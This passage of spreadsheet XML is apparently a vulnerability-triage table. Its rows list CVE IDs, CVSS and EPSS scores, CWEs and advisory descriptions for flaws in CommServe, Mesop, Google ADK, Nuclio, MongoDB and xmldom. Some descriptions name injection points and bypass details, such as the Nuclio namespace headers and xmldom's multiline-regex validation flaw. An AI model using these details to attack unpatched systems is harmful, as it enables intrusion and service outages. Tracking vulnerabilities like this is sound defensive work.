        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L453" s="5" t="inlineStr">
        <is>
          <t>CommServe contained an authentication bypass issue affecting access authorization and information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="M453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77103</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77105</t>
        </is>
      </c>
      <c r="C454" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E454" s="5" t="inlineStr"/>
      <c r="F454" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G454" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H454" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I454" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J454" s="5" t="inlineStr"/>
      <c r="K454" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L454" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a cryptographic signature verification issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update CommServe and Web Server.</t>
        </is>
      </c>
      <c r="M454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77105</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77357</t>
        </is>
      </c>
      <c r="C455" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E455" s="5" t="inlineStr"/>
      <c r="F455" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G455" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H455" s="5" t="inlineStr"/>
      <c r="I455" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J455" s="5" t="inlineStr"/>
      <c r="K455" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-834</t>
        </is>
      </c>
      <c r="L455" s="5" t="inlineStr">
        <is>
          <t>Mesop is a Python-based UI framework that allows users to build web applications. Prior to 1.3.3, applications running in debug mode expose a GET /hot-reload endpoint whose unbounded loop depends on the user-supplied counter parameter, allowing an unauthenticated attacker to hold worker threads with high counter values until the worker pool is exhausted and the server becomes unavailable. A single unauthenticated attacker can crash the Mesop server with minimal effort. Because the attack leverages worker exhaustion, the server remains unresponsive until it is manually restarted. This issue is fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="M455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77357</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79707</t>
        </is>
      </c>
      <c r="C456" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E456" s="5" t="inlineStr"/>
      <c r="F456" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G456" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H456" s="5" t="inlineStr"/>
      <c r="I456" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J456" s="5" t="inlineStr"/>
      <c r="K456" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L456" s="5" t="inlineStr">
        <is>
          <t>A Path Traversal vulnerability in the builder endpoint in Google Cloud Agent Development Kit (ADK) versions 1.9.0 through 1.21.0 on Python allows an unauthenticated remote attacker to read arbitrary files using a crafted file_path query parameter.</t>
        </is>
      </c>
      <c r="M456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79707</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79756</t>
        </is>
      </c>
      <c r="C457" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E457" s="5" t="inlineStr"/>
      <c r="F457" s="5" t="n">
        <v>0.051</v>
      </c>
      <c r="G457" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H457" s="5" t="inlineStr"/>
      <c r="I457" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J457" s="5" t="inlineStr"/>
      <c r="K457" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L457" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.17.4, the fix for unauthenticated OS command injection in the nuclio dashboard on the local/Docker platform is incomplete. The fix added validateFunctionName for function names and common.Quote() for the named-resource shell command path, but the list-all resource path (triggered when no specific resource name is provided) still interpolates the resourceNamespace parameter unquoted into a /bin/sh -c command string. An unauthenticated attacker can inject shell metacharacters via the X-Nuclio-Function-Namespace, X-Nuclio-Project-Namespace, or X-Nuclio-Function-Event-Namespace HTTP headers to achieve arbitrary command execution inside the dashboard container. This issue has been patched in version 1.17.4.</t>
        </is>
      </c>
      <c r="M457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79756</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82064</t>
        </is>
      </c>
      <c r="C458" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E458" s="5" t="inlineStr"/>
      <c r="F458" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G458" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H458" s="5" t="inlineStr"/>
      <c r="I458" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L458" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an unauthenticated network user to cause a denial of service on a specific type of replica set member. The server contains an assertion in its read concern processing logic that can be reached without authentication, and the assertion's assumptions about internal state do not hold for all member configurations, causing the server process to terminate.</t>
        </is>
      </c>
      <c r="M458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82075</t>
        </is>
      </c>
      <c r="C459" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E459" s="5" t="inlineStr"/>
      <c r="F459" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G459" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H459" s="5" t="inlineStr"/>
      <c r="I459" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L459" s="5" t="inlineStr">
        <is>
          <t>An uncontrolled resource consumption weakness exists in the request-handling path of the MongoDB sharded-cluster router process. A client that has network access to a router port and has not authenticated can supply connection-monitoring parameters that cause the server to expend CPU resources without any rate limiting, degrading or denying service to legitimate clients. No authentication, elevated privileges, or user interaction is required. Only availability is affected; data confidentiality and integrity are not impacted.</t>
        </is>
      </c>
      <c r="M459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83605</t>
        </is>
      </c>
      <c r="C460" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E460" s="5" t="inlineStr"/>
      <c r="F460" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G460" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H460" s="5" t="inlineStr"/>
      <c r="I460" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L460" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.14 and 0.9.11, and in xmldom version 0.6.0 and earlier, Element.setAttribute() calls the private _createAttribute(name) path without validating the attribute name, while Document.createAttribute(name) validates against QName. XMLSerializer.serializeToString() emits attribute names verbatim, and requireWellFormed: true did not validate them, so a crafted name can terminate the intended attribute and inject additional attributes, including event handlers, into browser-consumed output; synthesized xmlns:PREFIX declarations expose the same unchecked-name boundary. This issue is fixed in @xmldom/xmldom versions 0.8.14 and 0.9.11; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83605</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83606</t>
        </is>
      </c>
      <c r="C461" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E461" s="5" t="inlineStr"/>
      <c r="F461" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G461" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H461" s="5" t="inlineStr"/>
      <c r="I461" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L461" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.0-beta.9 until 0.9.11, the processing-instruction production in lib/grammar.js lets the greedy S+ separator and lazy Char*? data group repeatedly repartition a long whitespace tail when the required closing ?&gt; is absent. Both parsePI and parseProcessingInstruction apply the expression to the entire remaining source, causing quadratic backtracking during DOMParser.parseFromString() under default options and allowing a small unauthenticated XML input to stall the Node.js event loop. This issue is fixed in @xmldom/xmldom version 0.9.11.</t>
        </is>
      </c>
      <c r="M461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83606</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83607</t>
        </is>
      </c>
      <c r="C462" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E462" s="5" t="inlineStr"/>
      <c r="F462" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G462" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H462" s="5" t="inlineStr"/>
      <c r="I462" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L462" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.14 and 0.9.11, and in xmldom version 0.6.0 and earlier, Document.createElement(tagName) stores an unvalidated element name and XMLSerializer.serializeToString() emits that name verbatim. The requireWellFormed: true path did not validate the element qualified name or synthesized xmlns:PREFIX declaration, so attacker-controlled tag names could inject attributes, elements, or processing instructions into serialized XML or HTML and could cause cross-site scripting when browser-consumed. The unchecked values violate the XML QName constraint, and default serialization and creation-time createElement() behavior remain permissive. This issue is fixed in @xmldom/xmldom versions 0.8.14 and 0.9.11; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83607</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83608</t>
        </is>
      </c>
      <c r="C463" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E463" s="5" t="inlineStr"/>
      <c r="F463" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G463" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H463" s="5" t="inlineStr"/>
      <c r="I463" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J463" s="5" t="inlineStr"/>
      <c r="K463" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L463" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, the DOCUMENT_TYPE_NODE branch in lib/dom.js validates publicId, systemId, and internalSubset under requireWellFormed: true but emits DocumentType.name verbatim. A name containing &gt; or whitespace can terminate the &lt;!DOCTYPE ...&gt; declaration and inject sibling markup; the value can be supplied through createDocumentType() on the 0.8.x and unscoped lines or through a direct DocumentType.name property write on every affected line. The default path and legacy creation-time behavior remain permissive, while the vulnerable strict path fails to enforce an XML Name. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83608</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83609</t>
        </is>
      </c>
      <c r="C464" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E464" s="5" t="inlineStr"/>
      <c r="F464" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G464" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H464" s="5" t="inlineStr"/>
      <c r="I464" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-91</t>
        </is>
      </c>
      <c r="L464" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.0 until 0.9.12, the shared reg() builder in lib/grammar.js compiles the anchored QName_exact validator with the multiline flag, so ^ and $ validate only one line instead of the complete name. createElementNS, createAttributeNS, createDocumentType, and createAttribute consequently accept a malformed XML name whose first line is valid and whose later text injects markup when serialized through either the default path or requireWellFormed: true. The triggering ECMAScript line terminators are U+000A, U+000D, U+2028, and U+2029. This issue is fixed in @xmldom/xmldom version 0.9.12.</t>
        </is>
      </c>
      <c r="M464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83609</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83612</t>
        </is>
      </c>
      <c r="C465" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E465" s="5" t="inlineStr"/>
      <c r="F465" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G465" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H465" s="5" t="inlineStr"/>
      <c r="I465" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr">
        <is>
          <t>CWE-178, CWE-400</t>
        </is>
      </c>
      <c r="L465" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.0-beta.1 until 0.9.12, HTML-mode parsing through DOMParser.parseFromString() mishandles a mixed-case closing tag for the script, style, textarea, or title raw-text elements. parseHtmlSpecialContent, selected by isHTMLRawTextElement or isHTMLEscapableRawTextElement, uses a case-sensitive indexOf() and then calls substring() with a missing-close result of negative one, causing unstable parser progression and quadratic output amplification. A small untrusted text/html document can consequently consume disproportionate CPU and memory when parsed and serialized. This issue is fixed in @xmldom/xmldom version 0.9.12.</t>
        </is>
      </c>
      <c r="M465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83612</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83613</t>
        </is>
      </c>
      <c r="C466" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E466" s="5" t="inlineStr"/>
      <c r="F466" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G466" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H466" s="5" t="inlineStr"/>
      <c r="I466" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L466" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, DOMHandler.startElement in lib/dom-parser.js inserts every parsed attribute through setAttributeNode, while NamedNodeMap.setNamedItem in lib/dom.js calls the linear getNamedItem or getNamedItemNS lookup for each insertion. A well-formed element with many distinct attributes therefore requires quadratic comparisons during DOMParser.parseFromString() and can stall a Node.js event loop before application validation. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83613</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83614</t>
        </is>
      </c>
      <c r="C467" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E467" s="5" t="inlineStr"/>
      <c r="F467" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G467" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H467" s="5" t="inlineStr"/>
      <c r="I467" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="L467" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom versions 0.3.0 through 0.6.0, two independent quadratic paths can cause denial of service. In lib/sax.js, parseElementStartPart repeatedly rescans a malformed tag name to the next &gt; during single-character recovery; in lib/dom.js, normalize() repeatedly removes and appends adjacent text nodes, causing quadratic reindexing and string rebuilding. The first path is reachable through default DOMParser.parseFromString() processing, while the second is also reachable through a direct normalize() call on a programmatically constructed DOM, and endDocument invokes that normalization after parsing. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83614</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83615</t>
        </is>
      </c>
      <c r="C468" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E468" s="5" t="inlineStr"/>
      <c r="F468" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G468" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H468" s="5" t="inlineStr"/>
      <c r="I468" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L468" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom versions 0.1.5 through 0.6.0, appendElement in lib/sax.js uses _copy to clone the complete currentNSMap for each nested element that declares a new namespace prefix. Keeping every ancestor map live on the parse stack creates quadratic peak namespace-map storage, so a small highly compressible XML document can exhaust the process heap before application validation. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83615</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83616</t>
        </is>
      </c>
      <c r="C469" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E469" s="5" t="inlineStr"/>
      <c r="F469" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G469" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H469" s="5" t="inlineStr"/>
      <c r="I469" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L469" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, Document.createProcessingInstruction(target, data) in lib/dom.js accepts an unvalidated target, while the requireWellFormed: true serializer checks only for a colon and the reserved case-insensitive xml name on 0.9.x and performs no target check on 0.8.x. Because serialization emits &lt;?target data?&gt;, a target containing &gt;, ?, whitespace, or another invalid XML-name character can break the processing-instruction boundary and inject XML structure. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83616</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83617</t>
        </is>
      </c>
      <c r="C470" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E470" s="5" t="inlineStr"/>
      <c r="F470" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G470" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H470" s="5" t="inlineStr"/>
      <c r="I470" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-91</t>
        </is>
      </c>
      <c r="L470" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.11 until 0.9.12, the requireWellFormed: true element and attribute name checks use the anchored QName_exact expression produced by reg() in lib/grammar.js, which inherits the multiline flag. A name with a valid first line followed by U+000A, U+000D, U+2028, or U+2029 and breakout markup therefore passes validation and is emitted verbatim in element start and end tags or attribute names. This bypasses the strict-serialization checks introduced for the earlier element-name and attribute-name injection advisories, while the default serialization path remains outside the strict guarantee. This issue is fixed in @xmldom/xmldom version 0.9.12.</t>
        </is>
      </c>
      <c r="M470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83617</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83618</t>
        </is>
      </c>
      <c r="C471" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D471" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E471" s="5" t="inlineStr"/>
      <c r="F471" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G471" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H471" s="5" t="inlineStr"/>
      <c r="I471" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J471" s="5" t="inlineStr"/>
      <c r="K471" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-91</t>
        </is>
      </c>
      <c r="L471" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. From 0.9.10 until 0.9.12, the requireWellFormed: true serializer validates DocumentType.publicId and DocumentType.systemId with PubidLiteral_match and SystemLiteral_match expressions produced by reg() in lib/grammar.js, which inherit the multiline flag. A complete valid literal on the first line can therefore satisfy the matcher while U+000A, U+000D, U+2028, or U+2029 and breakout markup remain in the emitted &lt;!DOCTYPE ...&gt; declaration. This bypasses the strict-serialization mitigation for the earlier DocumentType injection advisory; creation and direct property assignment remain unvalidated by design. This issue is fixed in @xmldom/xmldom version 0.9.12.</t>
        </is>
      </c>
      <c r="M471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83618</t>
        </is>
      </c>
    </row>
    <row r="472">
      <c r="A472" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B472" s="5" t="inlineStr">
